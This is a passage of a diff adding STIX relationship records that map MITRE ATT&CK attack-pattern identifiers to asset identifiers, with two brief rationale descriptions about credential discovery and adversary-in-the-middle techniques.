"x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1f485a9d-c85d-4a48-b469-31b243d567db", + "created": "2024-06-26T15:40:02.947Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:40:02.947Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1f48b6a8-3fa9-4f57-893f-8e80b1748e04", + "created": "2024-06-26T15:41:50.918Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:41:50.918Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1f5874a1-7d57-4ee6-9773-d64484d53649", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1f5c30fb-7324-4b42-9d53-39081d43eeec", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1f6e7e9f-62bd-4e93-be74-8b00836571d3", + "created": "2024-06-27T09:43:53.872Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:43:53.872Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1f73c0bf-275b-461c-be95-eb4d2c6dac76", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1f74062e-2325-4fb0-9ad9-a8376708060b", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1f7c56fc-3be7-42d3-b16d-f1f52972dee1", + "created": "2024-06-26T15:40:36.160Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:40:36.160Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1f807308-2341-4844-909b-50c894670462", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1f8eee9c-696b-497c-a588-e44a49b79310", + "created": "2024-06-27T09:24:57.733Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:24:57.733Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--59bd0dec-f8b2-4b9a-9141-37a1e6899761", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1f9820db-0d55-4949-8b21-117e150a1fe8", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1fb00d64-4e5e-41af-9edb-bcf9d4134593", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1fc2da07-01a5-4021-b805-b0ac9a8f986b", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1fd10225-fb86-4ef3-a3be-c784e3d1d9a0", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1fd371af-08f4-43a4-9c62-83b43e02717c", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1fd49958-9695-4137-9aaa-57fde4b97cc8", + "created": "2023-09-29T17:09:59.595Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:09:59.595Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1fd5badc-0e9f-462c-9738-550e7e8d8ae3", + "created": "2023-09-28T19:54:37.802Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:54:37.802Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2002050c-7fd3-4835-a753-224d3b2d4715", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--203d9a6b-aea8-4166-a0f0-4d74e0e8cfe5", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--205f2226-9434-4703-bdab-8d09c06471b1", + "created": "2024-05-22T17:24:04.040Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T00:22:12.966Z", + "description": "Asset Mapping Rationale: Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. On network devices, private keys may be exported via Network Device CLI commands such as crypto pki export", + "relationship_type": "targets", + "source_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2065a3a9-434c-435b-9284-37e38da6770d", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2067eae0-bab7-4737-a5ad-9c4c439d6a2c", + "created": "2020-01-31T18:59:38.510Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--f792d02f-813d-402b-86a5-ab98cb391d3b", + "target_ref": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--206ded49-56fc-4c86-ab43-f4d45f5c343c", + "created": "2020-02-18T18:23:31.836Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--9ddc2534-e91c-4dab-a8f6-43dab81e8142", + "target_ref": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--208fe57b-cf2e-4188-8a6f-77597cd60351", + "created": "2023-09-29T17:44:43.317Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:44:43.317Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--209b777b-e31d-4c99-bc74-050f9ad3e7c2", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--20c01d16-fdd8-4f6b-ba0c-d81b70329440", + "created": "2020-03-09T14:07:54.891Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb", + "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--21058f32-3d6e-4381-9288-5c2248e84cce", + "created": "2023-09-29T18:44:27.240Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:44:27.240Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--21103c84-cbf8-48ee-b02f-edd13157bd89", + "created": "2020-10-01T02:17:46.135Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636", + "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--211182ef-49f8-4371-b757-c4d70f22652e", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2117c164-c0ba-4f33-afae-522853021ab9", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2138f4ee-5111-4469-92bb-1fc82a6822b4", + "created": "2023-09-28T19:44:53.873Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:44:53.873Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--21470001-67f2-47cf-af21-784e5024ac1d", + "created": "2023-09-29T18:01:22.023Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:01:22.023Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--21530e7b-4847-4a4a-899f-3e855381ce6c", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2156136c-2d51-4265-b604-898075d7948d", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2159458f-87fc-4479-81f4-a2521a378221", + "created": "2023-09-28T21:22:09.790Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:22:09.790Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--21638bb9-9a12-4dfc-b951-0b2e05bc2ca1", + "created": "2024-05-21T17:21:49.747Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-21T17:43:19.067Z", + "description": "Asset Mapping Rationale: Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique.", + "relationship_type": "targets", + "source_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2164fe7c-0ccc-45cd-b676-4d910fe0cbb0", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--21710bdd-2bba-49e3-ac50-f0774a92f6db", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", + "target_ref": 